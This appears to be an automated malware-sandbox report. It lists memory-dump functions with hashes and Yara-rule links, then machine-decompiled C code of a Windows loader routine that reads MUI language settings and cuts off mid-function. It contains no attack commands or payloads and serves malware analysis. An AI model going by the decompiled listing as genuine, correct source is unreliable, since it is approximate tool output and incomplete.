                                                                                                                                                              Function 0093F938, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                              • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                                                                              • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                              • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FAB8, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FA20, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                              • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                                                                                              • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                              • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FA50, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                                                                              • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                                                                                                                              • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                                                                              • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FBE8, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                                                                              • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                                                                                              • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                                                                              • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FB50, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FC30, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                              • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                                                                                              • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                              • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00940C40, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                                                                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FC48, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                              • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                                                                              • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                              • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00941D80, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                                                                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FD5C, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FE24, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FFFC, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0093FF34, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00968788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00968788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00968460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0094E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0096718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00968460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0096718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00968460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00968460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00968460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0096718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0094E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00942340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0095E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0094E2A8(_t322,  &_v68, _v16);
								if(E00965553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0095E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0094E2A8(_t322,  &_v68, _t236);
								if(E00965553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0096718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0094E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00942340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0095E679(_v20, _t332);
